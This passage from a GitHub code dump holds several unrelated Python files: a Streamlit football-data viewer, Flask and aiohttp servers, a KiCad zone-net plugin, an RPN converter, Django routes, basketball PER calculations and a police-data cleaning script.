For example 'training', 'traning', 'trainnin', 'training\"' and so on)\n vec = TfidfVectorizer()\n vec_tokens = vec.fit_transform(tokens)\n same_tokens = ((vec_tokens * vec_tokens.T) > 0.99)\n rows, cols = same_tokens.nonzero()\n\n for token_pair in zip(rows, cols):\n if(token_pair[0] > self.vocab_size):\n break\n if(token_pair[0] <= token_pair[1]):\n continue\n else:\n self.word_to_id[tokens[token_pair[1]]] = token_pair[0]\n \n def Smart_Split(self, text):\n \"\"\"Parsing function \n INPUT: text - python string with any text\n OUTPUT: list of strings, containing tokens\n \"\"\"\n out = text.strip().lower().replace('\\n', ' ')\n out = out.replace(',', ' , ').replace('.', ' . ').replace('!', ' ! ').replace('?', ' ? ')\n out = out.replace(')', ' ) ').replace('(', ' ( ').replace(':', ' : ').replace(';', ' ; ')\n return out.split()\n\n def MakeMasks(self, y):\n \"\"\"this function makes masks (bool np.arrays of length y). Each mask is \n cunstructed so that X[mask] is a part of data grouped by some combination \n of labels (for example - all data with al labels = 0, or all data with\n first class label = 1 and all other equal to 0, or all data with all \n labels equal to 1)\n INPUT: y - np.array of shape [n_samples, n_classes]\n OUTPUT: masks - list of bool np.arrays of length y\n \"\"\"\n \n def not_i_col(y, i):\n \"\"\"Utility function that returns all columns of y, except i-th\"\"\"\n mask = np.array([True, True, True, True, True, True])\n mask[i] = False\n return y[:, mask]\n\n # mask for data with label_excluded_i = 1 and all others = 0\n # important: there is no data for label_1 = 1 and all others equal to 0, \n # so skipping that mask\n mask1 = []\n for excluded_i in range(6):\n mask1.append(np.logical_and(y[:, excluded_i] == 1, \n np.sum(not_i_col(y, excluded_i), axis=1) == 0))\n\n # masks for 2, 3, 4, 5 and 6 labels respectivly equal to 1 (here we do not care, \n # which label (i.e. label_1, label_2, ...) \n # is equal to 1, just that there is exactly n=2,3,.. 
labels equal to 1)\n mask2 = np.sum(y, axis=1) == 2\n mask3 = np.sum(y, axis=1) == 3\n mask4 = np.sum(y, axis=1) == 4\n mask5 = np.sum(y, axis=1) == 5\n mask6 = np.sum(y, axis=1) == 6\n\n mask0 = (np.sum(y, axis=1) == 0)\n\n # let's save all masks in one list:\n masks = [{'mask':mask0, 'name':'all-negative data'}, \n {'mask':mask1[0], 'name':'only fisrt class labeled positive'},\n {'mask':mask1[2], 'name':'only third class labeled positive'},\n {'mask':mask1[3], 'name':'only fourth class labeled positive'},\n {'mask':mask1[4], 'name':'only fifth class labeled positive'},\n {'mask':mask1[5], 'name':'only sixth class labeled positive'},\n {'mask':mask2, 'name':'exactly two positive labels'},\n {'mask':mask3, 'name':'exactly three positive labels'},\n {'mask':mask4, 'name':'exactly four positive labels'},\n {'mask':mask5, 'name':'exactly five positive labels'},\n {'mask':mask6, 'name':'all-positive data'}]\n \n if(self.verbose >= 2): print('\\n\\tMasks created (a reminder - no data for \"only second class labeled positive\")', end='')\n \n return masks\n \n def __getitem__(self, i):\n if(self.mode == 'train'):\n return self.train_dataset[i]\n elif(self.mode == 'test'):\n return self.test_dataset[i]\n elif(self.mode == 'valid'):\n return self.valid_dataset[i]\n \n def __len__(self):\n if(self.mode == 'train'):\n return len(self.train_dataset)\n elif(self.mode == 'test'):\n return len(self.test_dataset)\n elif(self.mode == 'valid'):\n return len(self.valid_dataset)\n\n def shuffle(self):\n \"\"\"shuffles dataset, corresponding to current mode\"\"\"\n if(self.mode == 'train'):\n self.train_dataset = shuffle(self.train_dataset)\n elif(self.mode == 'test'):\n self.test_dataset = shuffle(self.test_dataset)\n elif(self.mode == 'valid'):\n self.valid_dataset = shuffle(self.valid_dataset)\n ","repo_name":"NikitaChizhov/ML-Project","sub_path":"ToxicTextsDataset.py","file_name":"ToxicTextsDataset.py","file_ext":"py","file_size_in_byte":19231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"29806237714","text":"import streamlit as st\r\nimport pandas as pd\r\nimport base64\r\nimport numpy as np\r\n\r\nst.title('Football Data App')\r\n#st.subheader('Data Source')\r\n#st.subheader('https://www.football-data.co.uk/')\r\n\r\nst.sidebar.header('Leagues')\r\nselected_league = st.sidebar.selectbox('League', ['England','Scotland','Germany','Italy','Spain','France','Netherlands','Belgium','Portugal','Turkey','Greece'])\r\n\r\nst.sidebar.header('Season')\r\nselected_year = st.sidebar.selectbox('Year', ['2022/2023', '2021/2022', '2020/2021', '2019/2020', '2018/2019', '2017/2018', '2016/2017', '2015/2016', '2014/2015', '2013/2014', '2012/2013', '2011/2012', '2010/2011'])\r\n\r\n# Web scraping\r\n# https://www.football-data.co.uk/mmz4281/2223/E0.csv\r\n@st.cache\r\ndef load_data(league, year):\r\n if selected_league == 'England':\r\n league = 'E0'\r\n if selected_league == 'Scotland':\r\n league = 'SC1'\r\n if selected_league == 'Germany':\r\n league = 'D1'\r\n if selected_league == 'Italy':\r\n league = 'I1'\r\n if selected_league == 'Spain':\r\n league = 'SP1'\r\n if selected_league == 'France':\r\n league = 'F1'\r\n if selected_league == 'Netherlands':\r\n league = 'N1'\r\n if selected_league == 'Belgium':\r\n league = 'B1'\r\n if selected_league == 'Portugal':\r\n league = 'P1'\r\n if selected_league == 'Turkey':\r\n league = 'T1'\r\n if selected_league == 'Greece':\r\n league = 'G1'\r\n\r\n if selected_year == '2010/2011':\r\n year = '1011'\r\n if 
selected_year == '2011/2012':\r\n year = '1112'\r\n if selected_year == '2012/2013':\r\n year = '1213'\r\n if selected_year == '2013/2014':\r\n year = '1314'\r\n if selected_year == '2014/2015':\r\n year = '1415'\r\n if selected_year == '2015/2016':\r\n year = '1516'\r\n if selected_year == '2016/2017':\r\n year = '1617'\r\n if selected_year == '2017/2018':\r\n year = '1718'\r\n if selected_year == '2018/2019':\r\n year = '1819'\r\n if selected_year == '2019/2020':\r\n year = '1920'\r\n if selected_year == '2020/2021':\r\n year = '2021'\r\n if selected_year == '2021/2022':\r\n year = '2122'\r\n if selected_year == '2022/2023':\r\n year = '2223'\r\n \r\n url = \"https://www.football-data.co.uk/mmz4281/\" + str(year) + \"/\" + league + \".csv\"\r\n data = pd.read_csv(url)\r\n # data = data[['Date', 'HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'FTR', 'B365H', 'B365D', 'B365A']]\r\n # data.columns = ['Date', 'Home', 'Away', 'Goals_H', 'Goals_A', 'Result', 'Odd_H', 'Odd_D', 'Odd_A']\r\n # data.dropna(inplace=True)\r\n data.reset_index(inplace=True, drop=True)\r\n data.index = data.index.set_names(['Nº'])\r\n data = data.rename(index=lambda x: x + 1)\r\n return data\r\ndf = load_data(selected_league, selected_year)\r\n\r\n# Sidebar - Columns selection\r\nsorted_unique_column = df.columns.to_list()\r\nselected_column = st.sidebar.multiselect('Columns', sorted_unique_column, ['Date', 'HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'FTR', 'B365H', 'B365D', 'B365A'])\r\n\r\n# Sidebar - Team selection\r\nsorted_unique_team = sorted(df.HomeTeam.unique())\r\nselected_team = st.sidebar.multiselect('Teams', sorted_unique_team, sorted_unique_team)\r\n\r\n# Filtering data\r\ndf_filtered = df[(df.HomeTeam.isin(selected_team))]\r\ndf_filtered = df_filtered[selected_column]\r\n\r\nst.subheader('DataFrame - '+selected_league)\r\nst.dataframe(df_filtered)\r\n\r\ndef filedownload(df):\r\n csv = df.to_csv(index=False)\r\n b64 = base64.b64encode(csv.encode()).decode() # strings <-> bytes conversions\r\n href = f'Download CSV File'\r\n return href\r\n\r\nst.markdown(filedownload(df_filtered), unsafe_allow_html=True)\r\n","repo_name":"FutPythonPunter/Football-Data.co.uk","sub_path":"Football-Data.co.uk.py","file_name":"Football-Data.co.uk.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32662961320","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Writing:\n def __init__( self, data ):\n self.id = data['id']\n self.title = data['title']\n self.description = data['description']\n self.content = data['content']\n\n @classmethod\n def save( cls, data ):\n query_string = \"INSERT INTO creations ( title, description, writing ) \\\n VALUES (%(title)s, %(description)s, %(content)s);\"\n return connectToMySQL().query_db(query_string, data)\n\n @classmethod\n def query_db( cls ):\n # query_string = \"SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='website';\"\n query_string = \"SELECT * FROM creatures WHERE id > 0;\"\n\n return connectToMySQL().query_db(query_string)\n \n @classmethod\n def query_db_2( cls ):\n query_string = \"SELECT * FROM writings WHERE id > 0;\"\n\n return connectToMySQL().query_db(query_string)\n \n","repo_name":"czmud/flask-app-digital-oceans","sub_path":"flask_app/models/writing.py","file_name":"writing.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 
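The league/season ladder of if-statements in load_data above can be collapsed into data: a minimal sketch using the same labels and URL codes (the helper name season_code is illustrative, not from the original app):

LEAGUE_CODES = {'England': 'E0', 'Scotland': 'SC1', 'Germany': 'D1', 'Italy': 'I1',
                'Spain': 'SP1', 'France': 'F1', 'Netherlands': 'N1', 'Belgium': 'B1',
                'Portugal': 'P1', 'Turkey': 'T1', 'Greece': 'G1'}

def season_code(label):
    # '2022/2023' -> '2223', matching the football-data.co.uk URL scheme
    start, end = label.split('/')
    return start[-2:] + end[-2:]

url = ('https://www.football-data.co.uk/mmz4281/'
       + season_code(selected_year) + '/' + LEAGUE_CODES[selected_league] + '.csv')

Each new league or season then becomes a one-entry change instead of another if-branch.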
+{"seq_id":"38060212364","text":"from aiohttp import web\n# from routes import setup_routes\n# from agent_controller import initialise\nfrom issuer_controller import initialize\n# from holder_controller import \nimport asyncio\nimport aiohttp_cors\nfrom views import *\n\nloop = asyncio.get_event_loop()\n# holder_loop = asyncio.get_event_loop()\n\nloop.run_until_complete(initialize())\n# holder_loop.run_until_complete(initialise())\n\napp = web.Application()\n\n# Credential issuance\napp.router.add_route(\"POST\",'/credential', send_credential)\napp.router.add_route(\"POST\", '/credential/issue', issue_credential)\n\n# Schema, Connection and Credential Definition ID\napp.router.add_route(\"POST\",'/schema', add_schema)\napp.router.add_route(\"GET\", '/schema/{schema_name}/{schema_version}', getSchemaAndCredIDs)\napp.router.add_route(\"GET\",'/connection', get_connection_id)\n\n# Proof and Verification\napp.router.add_route(\"GET\", '/proof-request', send_proof_request)\napp.router.add_route('GET', '/verify', verify_proof)\n\n# DID API Calls\napp.router.add_route(\"GET\", '/get-did', get_public_did)\napp.router.add_route(\"GET\", '/all-dids', get_all_dids)\napp.router.add_route(\"GET\", '/did-endpoint/{did}', get_did_endpoint)\n\n\n# Configure default CORS settings.\ncors = aiohttp_cors.setup(app, defaults={\n \"*\": aiohttp_cors.ResourceOptions(\n allow_credentials=True,\n expose_headers=\"*\",\n allow_headers=\"*\",\n )\n})\n\n# Configure CORS on all routes.\nfor route in list(app.router.routes()):\n cors.add(route)\n\nweb.run_app(app, host='0.0.0.0', port=8000)","repo_name":"talha-zshan/AriesPOC","sub_path":"tutorials/ariesPOC/server/issuer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27642447536","text":"#!/usr/bin/env python3\nimport pcbnew\nfrom collections import Counter\n\nclass ConnectZonesToIntersectingPadsPlugin(pcbnew.ActionPlugin):\n def defaults(self):\n self.name = \"Connect zones to intersecting pads\"\n self.category = \"A descriptive category name\"\n self.description = \"A description of the plugin and what it does\"\n self.show_toolbar_button = False # Optional, defaults to False\n\n def Run(self):\n selected_zones: list[pcbnew.ZONE] = [\n footprint for footprint in pcbnew.GetCurrentSelection()\n if type(footprint).__name__ == 'ZONE'\n ]\n \n for i, zone in enumerate(selected_zones):\n print(f\"Selected zone #{i+1}:\")\n zone_outline = zone.Outline()\n zone_possible_netcodes = Counter() # possible connected pads\n for footprint in list(pcbnew.GetBoard().GetFootprints()):\n for pad in list(footprint.Pads()):\n # Example of what to do with [pad]\n pad_shape = pad.GetEffectivePolygon()\n # If pad intersects zone\n if zone_outline.Collide(pad_shape):\n print(f\"\\tFootprint {footprint.GetReference()}/Pad {pad.GetName()} (Net {pad.GetNetname()}) intersects selected zone\")\n zone_possible_netcodes[pad.GetNetCode()] += 1\n # If we found no nets, skip this zone\n if not zone_possible_netcodes:\n print(f\"\\tZone has no pads intersecting it - ignoring\")\n # If we found more than one, warn\n elif len(zone_possible_netcodes) > 1:\n # Map zone_possible_netcodes to netnames\n zone_possible_netnames_and_counts = {\n pcbnew.GetBoard().FindNet(netcode).GetNetname(): count\n for netcode, count in zone_possible_netcodes.most_common()\n }\n print(f\"\\tZone has multiple nets intersecting it: {zone_possible_netnames_and_counts}\")\n # Select most common 
one\n zone_netcode = zone_possible_netcodes.most_common(1)[0][0]\n zone.SetNetCode(zone_netcode)\n print(f\"\\tSetting zone net to {pcbnew.GetBoard().FindNet(zone_netcode).GetNetname()}\")\n zone.SetNeedRefill(True)\n else: # We found exactly one net(code)\n zone_netcode = zone_possible_netcodes.most_common(1)[0][0]\n print(f\"\\tSetting zone net to {pcbnew.GetBoard().FindNet(zone_netcode).GetNetname()}\")\n zone.SetNetCode(zone_netcode)\n zone.SetNeedRefill(True)\n pcbnew.Refresh()\n\nConnectZonesToIntersectingPadsPlugin().register() # Instantiate and register to Pcbnew\n","repo_name":"ulikoehler/KiCAD-ConnectZonesToIntersectingPads","sub_path":"ConnectZonesToIntersectingPads.py","file_name":"ConnectZonesToIntersectingPads.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72555350976","text":"import datetime as dt\n\n\nTEACH_LOCATION_CHOICES = [('online', 'online'), ('at_mentor', 'at_mentor'), ('at_student', 'at_student')]\n\nminutes = [0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55]\n\nHOUR_CHOICES = [(dt.time(hour=x, minute=m), f'{x}:{m:02d}') for x in range(0, 24) for m in minutes]\n\nAGE_CHOICES = [(str(year), str(year)) for year in range(1933, 2007)]\n\nEDUCATION_START = [(str(year), str(year)) for year in range(1983, 2024)]\nEDUCATION_COMPLETE = [(str(year), str(year)) for year in range(1984, 2031)]\n\nEXPERIENCE_CHOICES = [\n ('adhd', 'קשב וריכוז'),\n ('teaching', 'הוראה')\n]\n\nCITIES_CHOICES = [(\"Jerusalem\", \"ירושלים\"),\n (\"Tel Aviv-Yafo\", \"תל אביב-יפו\"),\n (\"Haifa\", \"חיפה\"),\n (\"Rishon LeZion\", \"ראשון לציון\"),\n (\"Petah Tikva\", \"פתח תקווה\"),\n (\"Ashdod\", \"אשדוד\"),\n (\"Netanya\", \"נתניה\"),\n (\"Be'er Sheva\", \"באר שבע\"),\n (\"Bnei Brak\", \"בני ברק\"),\n (\"Holon\", \"חולון\"),\n (\"Ramat Gan\", \"רמת גן\"),\n (\"Ashkelon\", \"אשקלון\"),\n (\"Rehovot\", \"רחובות\"),\n (\"Beit Shemesh\", \"בית שמש\"),\n (\"Bat Yam\", \"בת ים\"),\n (\"Kfar Saba\", \"כפר סבא\"),\n (\"Herzliya\", \"הרצליה\"),\n (\"Hadera\", \"חדרה\"),\n (\"Modi'in-Maccabim-Re'ut\", \"מודיעין- מכבים- רעות\"),\n (\"Lod\", \"לוד\"),\n (\"Modi'in Illit\", \"מודיעין עילית\"),\n (\"Nazareth\", \"נצרת\"),\n (\"Ramla\", \"רמלה\"),\n (\"Ra'anana\", \"רעננה\"),\n (\"Rahat\", \"רהט\"),\n (\"Rosh HaAyin\", \"ראש העין\"),\n (\"Hod HaSharon\", \"הוד השרון\"),\n (\"Beitar Illit\", \"ביתר עילית\"),\n (\"Givatayim\", \"גבעתיים\"),\n (\"Kiryat Ata\", \"קריית אתא\"),\n (\"Nahariya\", \"נהריה\"),\n (\"Kiryat Gat\", \"קריית גת\"),\n (\"Umm al-Fahm\", \"אום אל-פחם\"),\n (\"Afula\", \"עפולה\"),\n (\"Eilat\", \"אילת\"),\n (\"Nes Ziona\", \"נס ציונה\"),\n (\"Acre\", \"עכו\"),\n (\"Yavne\", \"יבנה\"),\n (\"El'ad\", \"אלעד\"),\n (\"Ramat HaSharon\", \"רמת השרון\"),\n (\"Karmiel\", \"כרמיאל\"),\n (\"Tiberias\", \"טבריה\"),\n (\"Kiryat Motzkin\", \"קריית מוצקין\"),\n (\"Tayibe\", \"טייבה\"),\n (\"Shefaram\", \"שפרעם\"),\n (\"Nof HaGalil\", \"נוף הגליל\"),\n (\"Kiryat Bialik\", \"קריית ביאליק\"),\n (\"Kiryat Ono\", \"קריית אונו\"),\n (\"Kiryat Yam\", \"קריית ים\"),\n (\"Netivot\", \"נתיבות\"),\n (\"Ma'ale Adumim\", \"מעלה אדומים\"),\n (\"Or Yehuda\", \"אור יהודה\"),\n (\"Zefat\", \"צפת\"),\n (\"Dimona\", \"דימונה\"),\n (\"Tamra\", \"טמרה\"),\n (\"Ofakim\", \"אופקים\"),\n (\"Sakhnin\", \"סח'נין\"),\n (\"Baqa al-Gharbiyye\", \"באקה אל-גרבייה\"),\n (\"Yehud-Monosson\", \"יהוד-מונוסון\"),\n (\"Sderot\", \"שדרות\"),\n (\"Be'er Ya'akov\", \"באר יעקב\"),\n (\"Giv'at Shmuel\", \"גבעת שמואל\"),\n (\"Arad\", \"ערד\"),\n 
(\"Tira\", \"טירה\"),\n (\"Arraba\", \"עראבה\"),\n (\"Kfar Yona\", \"כפר יונה\"),\n (\"Migdal HaEmek\", \"מגדל העמק\"),\n (\"Kiryat Malakhi\", \"קריית מלאכי\"),\n (\"Kafr Qasim\", \"כפר קאסם\"),\n (\"Tirat Carmel\", \"טירת כרמל\"),\n (\"Yokneam Illit\", \"יקנעם עילית\"),\n (\"Nesher\", \"נשר\"),\n (\"Qalansawe\", \"קלנסווה\"),\n (\"Kiryat Shmona\", \"קריית שמונה\"),\n (\"Ma'alot-Tarshiha\", \"מעלות- תרשיחא\"),\n (\"Ariel\", \"אריאל\"),\n (\"Or Akiva\", \"אור עקיבא\"),\n (\"Beit She'an\", \"בית שאן\")]\n\n\nEDUCATION_LEVEL = [\n ('bachelors_degree', 'תואר ראשון'),\n ('masters_degree', 'תואר שני'),\n ('doctorate', 'דוקטורט'),\n ('teaching_certificate', 'תעודת הוראה'),\n ('diploma', 'לימודי תעודה'),\n ('high_school', 'תיכון'),\n]\n\n\n# TEACH_OPTIONS = [\n# ('online', 'Teach Online'),\n# ('mentor_place', \"Teach at Mentor's\"),\n# ('student_place', \"Teach at Student's\"),\n# ]\n\n\n# api for mentor\n# {\n# \"user\": {\n# \"email\": \"test18@gmail.com\",\n# \"password\": \"123\"\n# },\n# \"gender\": \"female\",\n# \"first_name\": \"אורי\",\n# \"last_name\": \"גשר\",\n# \"phone_num\": \"0553001034\",\n# \"education\": \"bachelors_degree\",\n# \"education_start_year\": \"2010\",\n# \"education_completion_year\": \"2014\",\n# \"year_of_birth\": \"1987\",\n# \"address_city\": \"Jerusalem\",\n# \"study_cities\": \"Jerusalem\",\n# \"short_description\": \"מסביר נהדר\",\n# \"long_description\": \"מלמד פייתון וכו\",\n# \"cost_hour_min\": 150,\n# \"cost_hour_max\": 201,\n# \"teach_in\": \"online\", // Provide\n# teach_in as a\n# string\n# with comma - separated values\n# \"experience_with\": \"\",\n# \"group_teaching\": true,\n# \"sub_topics\": [4],\n# \"students\": [4]\n# }\n\n\n","repo_name":"englefamily/MentorConnect","sub_path":"mentorconnect/helphers.py","file_name":"helphers.py","file_ext":"py","file_size_in_byte":5221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12371059206","text":"from typing import List\n\nfrom tokenizer.tokens import \\\n NumberToken, Operation, Brace, \\\n LeftBrace, RightBrace, \\\n PlusToken, MinusToken, MulToken, DivToken, Token\nfrom visitor.visitor import TokenVisitor\n\n\nclass RpnVisitor(TokenVisitor):\n def visitList(self, tokens: List[Token]) -> None:\n for t in tokens:\n t.accept(self)\n\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n self._stack.pop()\n\n if isinstance(last_elem, Operation):\n self._result.append(last_elem)\n else:\n raise RuntimeError(\"Not operation token in stack when token list is empty\")\n\n @property\n def result(self):\n return self._result\n\n @staticmethod\n def _operation_priority(token: Operation) -> int:\n op_p_map = {\n PlusToken(): 1,\n MinusToken(): 1,\n MulToken(): 2,\n DivToken(): 2,\n LeftBrace(): 0\n }\n return op_p_map[token]\n\n def __init__(self):\n self._result = []\n self._stack = []\n\n def visitBrace(self, token: Brace) -> None:\n if isinstance(token, LeftBrace):\n self._stack.append(token)\n elif isinstance(token, RightBrace):\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n self._stack.pop()\n\n if isinstance(last_elem, LeftBrace):\n return\n elif isinstance(last_elem, Operation):\n self._result.append(last_elem)\n elif isinstance(last_elem, NumberToken):\n raise RuntimeError(f\"Unexpected number in stack: {str(self._stack)}\")\n\n def visitOperation(self, token: Operation) -> None:\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n\n if 
self._operation_priority(token) <= self._operation_priority(last_elem):\n self._stack.pop()\n self._result.append(last_elem)\n else:\n break\n self._stack.append(token)\n\n def visitNumber(self, token: NumberToken) -> None:\n self._result.append(token)\n\n\n","repo_name":"evgeniyfeder/itmo","sub_path":"ppo/lab6/src/visitor/rpn_visitor.py","file_name":"rpn_visitor.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"22859110966","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n # path('finches/', views.finches_index, name='index'),\n path('finches/', views.finches_index, name=\"finches_index\"),\n path('finches//', views.finches_detail, name='detail'),\n path('finches/create/', views.FinchCreate.as_view(), name='finches_create'),\n path('finches//update/', views.FinchUpdate.as_view(), name='finches_update'),\n path('finches//delete/', views.FinchDelete.as_view(), name='finches_delete'),\n path('finches//add_feeding/', views.add_feeding, name='add_feeding'),\n path('finches//add_photo', views.add_photo, name='add_photo'),\n #Finch-park associate and unassociate functions: Many-to-Many\n path('finches//assoc_park/', views.assoc_park, name='assoc_park'),\n path('finches//unassoc_park/', views.unassoc_park, name='unassoc_park'),\n #parks paths\n path('parks/', views.ParkList.as_view(), name='parks_index'),\n path('parks/', views.ParkDetail.as_view(), name='parks_detail'),\n path('parks/create/', views.ParkCreate.as_view(), name='parks_create'),\n path('park//update/', views.ParkUpdate.as_view(), name='parks_update'),\n path('parks//delete/', views.ParkDelete.as_view(), name='parks_delete'),\n #Auth\n path('accounts/signup/', views.signup, name='signup'),\n \n]\n","repo_name":"SvitlanaKarahayeva/finch-collector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40823851039","text":"\ndef VOP_fn(df):\n lg_PTS = df['PTS'].sum()\n lg_FGA = df['FGA'].sum()\n lg_ORB = df['OFF'].sum()\n lg_TOV = df['TO'].sum()\n lg_FTA = df['FTA'].sum()\n return lg_PTS / (lg_FGA - lg_ORB + lg_TOV + 0.44 * lg_FTA)\n\ndef DRB_fn(df):\n lg_TRB = df['TOT'].sum()\n lg_ORB = df['OFF'].sum()\n return (lg_TRB - lg_ORB) / lg_TRB\n\ndef factor_fn(df):\n lg_AST = df['A'].sum()\n lg_FG = df['FG'].sum()\n lg_FT = df['FT'].sum()\n return (2 / 3) - (0.5 * (lg_AST / lg_FG)) / (2 * (lg_FG / lg_FT))\n\ndef poss_fn(df,team):\n FGA = df[df['TEAM']==team]['FGA'].sum()\n FTA = df[df['TEAM']==team]['FTA'].sum()\n ORB = df[df['TEAM']==team]['OFF'].sum()\n TOV = df[df['TEAM']==team]['TO'].sum()\n opp = df[(df['MATCH'].str.contains(team)) & (df['TEAM']!=team)]\n op_FGA = opp['FGA'].sum()\n op_FTA = opp['FTA'].sum()\n op_ORB = opp['OFF'].sum()\n op_TOV = opp['TO'].sum()\n poss = 0.5 * (FGA + 0.475 * FTA - ORB + TOV) + 0.5 * (op_FGA + 0.475 * op_FTA - op_ORB + op_TOV)\n return poss\n\ndef pace_fn(df,team):\n return 40 * (poss_fn(df,team) / (0.2 * df[df['TEAM']==team]['MINS'].sum()))\n\ndef league_pace_fn(df):\n teams = df['TEAM'].unique()\n pace = 0\n for x in teams:\n pace += pace_fn(df,x)\n return pace/len(teams)\n\ndef uPER_fn(df,player,team):\n #team = df[df['PLAYER']==player]['TEAM'].values[0]\n VOP = VOP_fn(df)\n DRB = DRB_fn(df)\n factor = factor_fn(df)\n MP = 
df[df['PLAYER']==player]['MINS'].sum()\n _3P = df[df['PLAYER']==player]['3P'].sum()\n AST = df[df['PLAYER']==player]['A'].sum()\n FT = df[df['PLAYER']==player]['FT'].sum()\n FTA = df[df['PLAYER']==player]['FTA'].sum()\n TOV = df[df['PLAYER']==player]['TO'].sum()\n FGA = df[df['PLAYER']==player]['FGA'].sum()\n FG = df[df['PLAYER']==player]['FG'].sum()\n TRB = df[df['PLAYER']==player]['TOT'].sum()\n ORB = df[df['PLAYER']==player]['OFF'].sum()\n STL = df[df['PLAYER']==player]['STL'].sum()\n BLK = df[df['PLAYER']==player]['BLK'].sum()\n PF = df[df['PLAYER']==player]['PF'].sum()\n team_AST = df[df['TEAM']==team]['A'].sum()\n team_FG = df[df['TEAM']==team]['FG'].sum()\n lg_FT = df['FT'].sum()\n lg_PF = df['PF'].sum()\n lg_FTA = df['FTA'].sum()\n\n uPER = (1 / MP)*(_3P + (2/3) * AST + (2 - factor * (team_AST / team_FG)) * FG +\n (FT *0.5 * (1 + (1 - (team_AST / team_FG)) + (2/3) * (team_AST / team_FG))) -\n VOP * TOV - VOP * DRB * (FGA - FG) - VOP * 0.44 * (0.44 + (0.56 * DRB)) *\n (FTA - FT) + VOP * (1 - DRB) * (TRB - ORB) + VOP * DRB * ORB + VOP * STL +\n VOP * DRB * BLK - PF * ((lg_FT / lg_PF) - 0.44 * (lg_FTA / lg_PF) * VOP) )\n\n return uPER\n\ndef league_uPER(df,players):\n luPER = []\n for x in players:\n luPER.append(uPER_fn(df,x[0],x[1]))\n return luPER\n\ndef PER(df,player,team, league_uPER, league_pace):\n uPER = uPER_fn(df,player,team)\n #lg_pace = league_pace_fn(df)\n #lg_pace2006 = 85.94778787902771\n lg_pace = league_pace\n tm_pace = pace_fn(df,team)\n lguPER = league_uPER\n #lguPER = 0.22530543318559995\n #lguPER2006 = 0.21923570021192998\n PER_val = (uPER * (lg_pace/tm_pace)) * (15/lguPER)\n return PER_val\n\nif __name__=='__main__':\n pass\n","repo_name":"Scroomb/college-basketball-predictions","sub_path":"per.py","file_name":"per.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11637614660","text":"from lib.columns import clean_column_names\nimport deba\nfrom lib.clean import (\n clean_dates,\n clean_names,\n standardize_desc_cols,\n clean_sexes,\n clean_races,\n)\nfrom lib.uid import gen_uid\nimport pandas as pd\n\n\ndef realign() -> pd.DataFrame:\n df = pd.read_csv(\n deba.data(\"raw/new_orleans_harbor_pd/new_orleans_harbor_pd_cprr_2014-2020.csv\")\n )\n df = (\n df.set_index(\"Unnamed: 0\")\n .transpose()\n .dropna(axis=1, how=\"all\")\n .reset_index(drop=True)\n )\n df = clean_column_names(df)\n return df\n\n\ndef split_name(df):\n names = df.full_name.str.split(\" \", expand=True)\n df.loc[:, \"first_name\"] = names.iloc[:, 0]\n df.loc[:, \"last_name\"] = names.iloc[:, 1]\n df = df.drop(columns=\"full_name\")\n return df\n\n\ndef strip_badge(df):\n df.loc[:, \"badge_no\"] = df.badge_no.str.strip().str.replace(\n r\"\\s+\\(call sign\\)$\", \"\", regex=True\n )\n return df\n\n\ndef clean_officer_sex(df):\n df.loc[:, \"sex\"] = df.sex.str.lower()\n return df\n\n\ndef assign_agency(df):\n df.loc[:, \"agency\"] = \"new-orleans-harbor-pd\"\n df.loc[:, \"data_production_year\"] = \"2020\"\n return df\n\n\ndef assign_allegations(df):\n df.loc[:, \"b_rule_violation\"] = (\n df.b_rule_violation.str.lower().str.strip().str.replace(r\"(.+)\", r\"rule: \\1\")\n )\n df.loc[:, \"c_paragraph_violation\"] = (\n df.c_paragraph_violation.str.lower()\n .str.strip()\n .str.replace(r\"(.+)\", r\"paragraph: \\1\")\n )\n\n df.loc[:, \"allegation\"] = df.c_paragraph_violation.str.cat(\n df.b_rule_violation, sep=\"; \"\n )\n df.loc[:, \"allegation\"] = df.allegation.str.cat(\n 
